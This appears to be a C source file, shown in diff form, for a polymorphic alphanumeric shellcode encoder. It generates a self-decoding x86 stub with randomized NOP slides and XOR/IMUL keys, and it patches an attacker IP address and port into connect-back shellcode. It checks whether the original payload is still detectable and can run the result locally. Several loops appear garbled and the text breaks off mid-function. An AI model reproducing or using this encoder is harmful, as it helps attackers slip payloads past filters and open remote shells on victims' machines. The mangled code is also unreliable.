- //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | - // | | | | | | - // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | - // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | - // or the offset will not be alphanumeric. | | | | | | - // | | | | | | - // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | - // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | - // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | - // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | - // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | - // register instead. We happen to have such a register - edi =] | | | | | | - // | | | | | | - // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | - // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | - // the pop eax would overwrite it | | | | | | - // | | | | | | - // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | - // alphanumeric.). | | | | | | - // | | | | | | - // -OBSOLETE- | | | | | | - // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | - // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | - // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | - // (add the number of bytes to it) | | | | | | - // If you wish to move it down, you will need to move it down by an even number of | | | | | | - // bytes. | | | | | | - // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | - // (deduct the number of bytes from it) | | | | | | - // | | | | | | - // TODO: make a routine that moves it around randomally between allowed values | | | | | | - // and sets the proper offsets | | | | | | - // this routine should be called after the NOP slides have been randomized. | | | | | | - // | | | | | | - ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | - /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | - /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | - /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | - /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | - /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | - /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | - /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | - /*83*/ '\x49',// //dec esi| |// | | | | | | - /*84*/ '\x41',// //push eax| |// | | | | | | - /*85*/ '\x49',// //pop eax| |// | | | | | | - /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | - /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | - // IMUL can go down to here | | | | | | - ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | - /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | - ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | - /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | - /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | - /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | - /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | - /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | - /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | - /*104*/ '\x45', //ebp incremented once //inc ebp | | | | - /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | - /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | - '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | - };////////////////////////////////////////////////// | | - UINT shrink; // | | - UCHAR *found_msg; // | | - UCHAR *p_decoder = decoder; // | | - UCHAR xor1, xor2, key; // | | - UCHAR temp_buf[3] = ""; // | | - UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | - UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | - struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | - UCHAR *p_shellcode = shellcode; // | | - void *_eip = 0; // | | - // | | - int offset_nop_slide1; // | | - int offset_nop_slide2; // | | - int offset_half_size_decoder; // | | - int offset_terminating_key; // | | - int offset_imul_instruction1; // | | - int offset_imul_instruction2; // | | - int offset_imul_instruction3; // | | - int offset_imul_instruction4; // | | - int negative_offset_size_decoder1; // | | - int negative_offset_size_decoder2; // | | - int negative_offset_size_decoder3; // | | - int offset_size_decoder_min_1; // | | - int offset_size_decoder_pls_2; // | | - int offset_imul_key_offset1; // | | - int offset_imul_key_offset2; // | | - int offset_imul_key_offset3; // | | - int offset_imul_instruction; // | | - int size_nop_slide1; // | | - int size_nop_slide2; // | | - int offset_jne_xor1; // | | - int offset_jne_xor2; // | | - int decoder_length_section1; // | | - int decoder_length_section2; // | | - int decoder_length_section3; // | | - int imul_instruction_length; // | | - int jne_xor_negative_offset; // | | - int backward_slide_offset; // | | - BOOL decoder_version_1; // | | - UINT srand_value; // | | -#ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | - printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | - found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | - if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | - else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | -#endif ////////////////// | | - printf("shellcode length:%d\n", size); // | | - srand_value = time(NULL); // | | -// srand_value = ; // for debugging | | - srand(srand_value); // | | - printf("srand value=%d\n", srand_value); // | | - decoder_version_1 = rand() % 2; // | | - ///// | | - size_decoder = strlen(decoder);// | | - decoder_length_section1 = 30; ////////////// | | - decoder_length_section2 = 29; // | | - decoder_length_section3 = 18; // | | - // | | - size_nop_slide1 = 28; // | | - size_nop_slide2 = 0; // | | - // | | - imul_instruction_length = 4; // | | - // | | - shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | - memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | - decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | - imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | - size_decoder -=shrink; /////////////////////////////////////////////////////// | | - half_size_decoder = size_decoder/2; // | | - size_nop_slide1 -=shrink; ///////////////////////// | | - printf("shrinking decoder by: %d\n", shrink); // | | - // | | - offset_imul_instruction = decoder_length_section1+// | | - decoder_length_section2+// | | - size_nop_slide1;////////// | | - // | | - backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | - strncpy(decoder, // | | - slide_substr_back(decoder, // | | - offset_imul_instruction, // | | - imul_instruction_length, // | | - size_decoder, ///// | | - backward_slide_offset), // | | - size_decoder); // | | - offset_imul_instruction -=backward_slide_offset; // | | - size_nop_slide1 -=backward_slide_offset; // | | - size_nop_slide2 +=backward_slide_offset; ////////////// | | - printf("backward_slide_offset = %d\n", backward_slide_offset);// | | - /////////////////////////////////// | | - negative_offset_size_decoder1 = 9; // | | - negative_offset_size_decoder2 = 12; // | | - negative_offset_size_decoder3 = 15; // | | - // | | - offset_half_size_decoder = 6; // | | - offset_terminating_key = 8; // | | - offset_jne_xor1 = 21; // | | - offset_size_decoder_min_1 = 24; // | | - // | | - offset_imul_key_offset1 = 14 + decoder_length_section1; // | | - offset_imul_key_offset2 = 17 + decoder_length_section1; // | | - offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | - offset_imul_key_offset3 = 24 + decoder_length_section1; // | | - // | | - offset_nop_slide1 = decoder_length_section1+ // | | - decoder_length_section2; // | | - offset_nop_slide2 = decoder_length_section1+ // | | - decoder_length_section2+ // | | - size_nop_slide1+ // | | - imul_instruction_length; // | | - // | | - offset_imul_instruction1 = offset_imul_instruction; // | | - offset_imul_instruction2 = offset_imul_instruction+1; // | | - offset_imul_instruction3 = offset_imul_instruction+2; // | | - offset_imul_instruction4 = offset_imul_instruction+3; // | | - // | | - // | | - offset_imul_key = offset_imul_instruction4; // | | - // | | - offset_jne_xor2 = size_decoder-1; // | | - jne_xor_negative_offset = decoder_length_section3+ // | | - decoder_length_section2+ // | | - size_nop_slide2+ // | | - imul_instruction_length+ // | | - size_nop_slide1; // | | - // | | - // | | - printf("size_decoder=0x%2X - %s\n", // | | - (UCHAR)size_decoder, ////// | | - is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | - // | | - printf("half_size_decoder=0x%2X - %s\n", // | | - (UCHAR)half_size_decoder, // | | - is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | - *(decoder+offset_half_size_decoder) = half_size_decoder; // | | - // | | - printf("offset_imul_key=0x%2X - %s\n", // | | - (UCHAR)offset_imul_key, // | | - is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | - *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | - *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | - *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | - // // | | - printf("size_decoder-1=0x%2X - %s\n", // | | - (UCHAR)size_decoder-1, // | | - is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | - *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | - // | | - printf("size_decoder+2=0x%2X - %s\n", // | | - (UCHAR)size_decoder+2, //////// | | - is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | - // | | - *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | - *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | - *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | - // | | - *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | - '\xFF', // | | - 0); // | | - *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | - '\xFF', // | | - 1); // | | -#ifdef CONNECT_BACK_SHELLCODE // | | - ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | - if (ip_address == -1) /////////////////////////////////////////////////// | | - exit(-1); // | | - /////////////////////////////////// | | - //set shellcode with ip address and port for connect-back // | | - ///* ////////// | | - *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | - *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | - *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | -#endif ////////////////////////////////////////// | | - //*/ // | | - //set decoder with 'random' nop slides // | | - strncpy(decoder+offset_nop_slide1, //////////////////////////// | | - shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | - size_nop_slide1); // | | - strncpy(decoder+offset_nop_slide2, // | | - shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | - size_nop_slide2); /////////////////////////////// | | - // | | - //set decoder with random initial key //////////////////////////////////////////// | | - *(decoder+offset_imul_key) = get_random_alnum_value();// | | - printf("initial key=0x%2X - %s\n", ////////////// | | - (UCHAR)*(decoder+offset_imul_key), // | | - is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | - // | | - ////////////// | | - // | | - //set decoder with 'random' dword pushes for registers we won't use //////////////// | | - *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword1=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword2=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword3=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword4=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | - // | | - //bugfix: this time after srand() :) // | | - xor_al1=get_random_alnum_value(); // | | - xor_al2=get_random_alnum_value(); // | | - *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | - *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | - *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | - *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | - // | | - memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | - randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' - SIZE_RANDOMIZED_DECODER_HEAD); ////// | - //set first xor1 to random alnum value (this is the first byte of the encoded data) // | - xor1 = get_random_alnum_value(); // | - printf("xor1=0x%2X - %s\n", // | - (UCHAR)xor1, // | - is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | - ///////////////////////////////////////////////////////// | -RE_RUN: // | - sprintf(alnum_shellcode, "%s",decoder); // | - memset(temp_buf, 0, 3);/////////////////// | - for(i=0; ikey; // | - xor2=p_xor2_key->xor2; // | - temp_buf[0] = xor1; // | - temp_buf[1] = xor2; // | - strcat(alnum_shellcode, temp_buf); // append it to our decoder // | - xor1=key; // | - free_p_xor2_key(p_xor2_key); // free the list // | - } //get next original_byte // | - //////////////////////// | - if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | - { // | - printf("error - terminating key found in encoded shellcode. running again to fix\n");// | - goto RE_RUN; // | - } ///////////////////////////////////////////////////// | - *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | - *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | - (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | - 4); // | - // | - //bugfix: handle case of esp pointing to shellcode // | - if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | - { // | - // _asm{ // | - // push esp; // | - // pop eax; // | - // xor al, 0x36; // | - // xor al, 0x30; // | - // } // | - p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | - memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | - memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | - p_alnum_shellcode[0] = 'T'; // | - p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | - p_alnum_shellcode[2] = '4'; // and using other xor values // | - p_alnum_shellcode[3] = '6'; // <-- (x+6) // | - p_alnum_shellcode[4] = '4'; // // | - p_alnum_shellcode[5] = '0'; // <-- x // | - p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | - p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | - size_decoder += 6; // | - } // | - // | - printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | - printf("decoder length: %d\n%s\n", // | - size_decoder, // | - p_alnum_shellcode); // | - // | - printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | - found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | - if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | - else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | - // | - if (str_is_alnum(alnum_shellcode)) // | - { // | - printf("execute shellcode locally? (hit: y and press enter): ");// | - if(tolower(getchar()) == 'y') // | - { ///////////// | - _asm // | - { // | - push p_alnum_shellcode; //////// | - pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' - //jump to head of decoder // - jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// - } ////////////// - } // - } // - else // - { /////////////// - printf("error non-alphanumeric shellcode\n"); // - } ////////////////////////////// - ///////// - // - return 0; ////// -} // -/////////////////// - -BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, - UCHAR *known_pattern, - UINT known_pattern_length, - UINT offset1, - UINT offset2, - UINT offset3) -{ - UINT offset, - i, - found; - - for (i=found=offset=0; i0;length--) { - if( - !is_alnum(str[length-1]) - ) - return 0; - } - return 1; -} - -UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) -{ - int xor_complement_1, xor_complement_2; - UCHAR two_xor_complements[3]; - - for(xor_complement_1=0; xor_complement_1 255 ? -1 : (x[3] <<= 24); - x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); - x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); - x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); - dwIpAddress = x[0]+x[1]+x[2]+x[3]; - - - return dwIpAddress; -} - -DWORD my_htonl(DWORD dw_in) -{ - DWORD dw_out; - - *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); - *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); - *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); - *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); - - return dw_out; -} - -void free_p_xor2_key(struct xor2_key *node) -{ - struct xor2_key *temp = 0; - - if(node) - { - temp = node->prev; - while(node->next) - { - node=node->next; - free(node->prev); - } - free(node); - } - if(temp) - { - while(temp->prev) - { - temp=temp->prev; - free(temp->next); - } - free(temp); - } -} - -struct xor2_key *choose_random_node(struct xor2_key *head) -{ - int num_nodes = 1, selected_node, i; - struct xor2_key* tail = head; - - struct xor2_key* pn = NULL ; - - if (!head || !head->key) - return 0; - - while(tail->next) - { - tail = tail->next; - num_nodes++; - } - - selected_node = rand()%num_nodes; - - for(i=0; inext; - - return head; -} - -struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) -{ - struct xor2_key *p_xor2_key, *p_xor2_key_head; - char *alnum = ALNUM_CHARSET; - UINT i=0, - z=1, - r=0, - count=0; - UCHAR xor2=0, - x=0; - - p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); - p_xor2_key->prev = 0; - p_xor2_key->next = 0; - p_xor2_key->key = 0; - p_xor2_key->xor2 = 0; - - for(i=0; alnum[i]; i++) - { - for(x=0; alnum[x];x++) - { - xor2 = alnum[x]; - if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) - { - p_xor2_key->xor2 = xor2; - p_xor2_key->key = alnum[i]; - p_xor2_key->next = malloc(sizeof(struct xor2_key)); - p_xor2_key->next->prev = p_xor2_key; - p_xor2_key = p_xor2_key->next; - p_xor2_key->key=0; - p_xor2_key->xor2=0; - } - } - } - - if(!p_xor2_key->key) - p_xor2_key->next = 0; - if (p_xor2_key->prev) - p_xor2_key = p_xor2_key->prev; - else - return 0; - free(p_xor2_key->next); - p_xor2_key->next=0; - return p_xor2_key_head; -} - -UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. -{ - UINT last, randomNum; - UCHAR temporary; - UCHAR *output = malloc(length); - memcpy(output, str, length); - for (last = length; last > 1; last--) - { - randomNum = rand( ) % last; - temporary = output[randomNum]; - output[randomNum] = output[last-1]; - output[last-1] = temporary; - } - memcpy(str, output, length); - return output; -}// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm - - -UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) -{ - UCHAR *prefix_substr, - *substr, - *suffix_substr, - *output_str; - UINT prefix_substr_len, - suffix_substr_len; - - - if(slide > substr_offset) { - printf("you can't slide it that far back!\n"); - return 0; - } - - output_str = malloc(str_len); - memset(output_str, 0 , str_len); - - suffix_substr_len = str_len-substr_len-substr_offset; - suffix_substr = malloc(suffix_substr_len); - memset(suffix_substr, 0, suffix_substr_len); - - prefix_substr_len = substr_offset; - prefix_substr = malloc(prefix_substr_len); - memset(prefix_substr, 0, prefix_substr_len); - - substr = malloc(substr_len); - memset(substr, 0, substr_len); - - strncpy(substr, str+substr_offset, substr_len); - strncpy(prefix_substr, str, prefix_substr_len); - strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); - - strncpy(output_str, prefix_substr, prefix_substr_len-slide); - strncpy(output_str+prefix_substr_len-slide, substr, substr_len); - strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); - strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); - - - free(prefix_substr); - free(suffix_substr); - free(substr); - return output_str; -} - -UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) -{ - UCHAR *prefix_substr, - *substr, - *suffix_substr, - *output_str; - UINT prefix_substr_len, - suffix_substr_len; - - - if(slide > str_len-substr_len-substr_offset) { - printf("you can't slide it that far forward!\n"); - return 0; - } - - output_str = malloc(str_len); - memset(output_str, 0 , str_len); - - suffix_substr_len = str_len-substr_len-substr_offset; - suffix_substr = malloc(suffix_substr_len); - memset(suffix_substr, 0, suffix_substr_len); - - prefix_substr_len = substr_offset; - prefix_substr = malloc(prefix_substr_len); - memset(prefix_substr, 0, prefix_substr_len); - - substr = malloc(substr_len); - memset(substr, 0, substr_len); - - strncpy(substr, str+substr_offset, substr_len); - strncpy(prefix_substr, str, prefix_substr_len); - strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); - - strncpy(output_str, prefix_substr, prefix_substr_len); - strncpy(output_str+prefix_substr_len, suffix_substr, slide); - strncpy(output_str+prefix_substr_len+slide, substr, substr_len); - strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); - - - free(prefix_substr); - free(suffix_substr); - free(substr); - return output_str; -} - -UCHAR *get_nop_slide(UINT size, UINT slide) -{ //simple alnum nop slide generator - UINT i, x, append_dec_eax = 0; - UCHAR alnum_nop[][3] = { - "AI", //inc ecx;dec ecx // (alnum_nop[0]) - "BJ", //inc edx;dec edx // (alnum_nop[1]) - "CK", //inc ebx;dec ebx // (alnum_nop[2]) - "EM", //inc ebp;dec ebp // (alnum_nop[3]) - "FN", //inc esi;dec esi // (alnum_nop[4]) - "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] - "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] - "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] - - "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now -// "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account -// "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from -// "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. -// | -//TODO: <-----------------------------------------------------------------------------------' -// push eax push eax push eax push ecx push edx -// pop eax push ecx push ecx dec esp pop edx -// push ecx pop ecx push edx inc esp push ecx -// pop ecx pop eax inc esp pop ecx pop ecx -// push edx push edx dec esp push eax push eax -// pop edx pop edx pop edx inc esp pop eax -// pop ecx dec esp . -// pop eax pop eax . -// push edx . -// pop edx etc... - }; - UCHAR *nop_slide; - nop_slide = malloc(size); - memset(nop_slide, 0, size); - if(size%2) - { - append_dec_eax = 1; - size--; - } - for(i=0; i<(size/2); i++) { - do - x = rand()%(sizeof(alnum_nop)/3); - while - ((slide==2)&&(x==6||x==7)); - strcat(nop_slide, alnum_nop[x]); - } - if(append_dec_eax) - { - strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide - } - return nop_slide; -} - -UCHAR get_random_alnum_push_dword_opcode() -{ - UCHAR alnum_push_dword_opcode[] = - { - 'P', //0x50 push eax - 'Q', //0x51 push ecx - 'R', //0x52 push edx - 'S', //0x53 push ebx - 'T', //0x54 push esp - 'U', //0x55 push ebp - 'V', //0x56 push esi - 'W' //0x57 push edi - }; - return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; -} - -UCHAR get_random_alnum_value() -{ - char alnum_values[] = ALNUM_CHARSET; - return alnum_values[rand()%strlen(alnum_values)]; -} - -UCHAR get_push_register_instruction(UCHAR *reg) -{ - if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax - else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx - else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx - else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx - else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp - else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp - else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi - else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi - else return 0; -} - -UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) -{ - UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; - UCHAR instructions[11][3]; - UCHAR instruction_comments[11][28]; - UINT i,c, state; - UCHAR *output; - UCHAR *random_states; - UCHAR *p_state[5]; - - output = malloc(17); - memset(output, 0, 17); - memset(instructions, 0, 11*3); - memset(instruction_comments, 0, 11*28); - instructions[0][0] = '\x6a'; //j - instructions[0][1] = xor_al1; // - instructions[1][0] = '\x58'; //X - instructions[2][0] = '\x34'; //4 - instructions[2][1] = xor_al1; // - instructions[3][0] = '\x48'; //H - instructions[4][0] = '\x34'; //4 - instructions[4][1] = jne_xor1; // - instructions[5][0] = '\x30'; //0 - instructions[5][1] = '\x42'; //B - instructions[5][2] = size_decoder-1; // - instructions[6][0] = '\x52'; //R - instructions[7][0] = '\x52'; //R - instructions[8][0] = '\x59'; //Y - instructions[9][0] = '\x47'; //G - instructions[10][0] = '\x43'; //C - - strcat(instruction_comments[0], "push XOR_AL1"); - strcat(instruction_comments[1], "pop eax"); - strcat(instruction_comments[2], "xor al, XOR_AL1"); - strcat(instruction_comments[3], "dec eax"); - strcat(instruction_comments[4], "xor al, JNE_XOR1"); - strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); - strcat(instruction_comments[6], "push edx"); - strcat(instruction_comments[7], "push edx"); - strcat(instruction_comments[8], "pop ecx"); - strcat(instruction_comments[9], "inc edi"); - strcat(instruction_comments[10], "inc ebx"); - do { - memset(p_state, 0, sizeof(UCHAR*)*5); - random_states = shuffle(states, 11); - - //.*0.*1.*2.*3.*4.*5 - p_state[0] = memchr(random_states, 0, 11); - if(p_state[0]) - p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); - - //.*[67].*8 - if(p_state[1]) - { - p_state[2] = memchr(random_states, 6, 11); - p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); - if(!p_state[3]) - { - p_state[2] = memchr(random_states, 7, 11); - p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); - } - if(p_state[3]) - { - //.*1.*[67].*[67] - if(p_state[2] && p_state[1] < p_state[2]) - p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); - - //.*0.*[67].*8.*1 - if(!p_state[4]) - p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); - if(!p_state[4]) - p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); - - //.*[67].*8.*0.*1.*[67] - if(!p_state[4]) - p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); - if(p_state[4]) - p_state[4] = 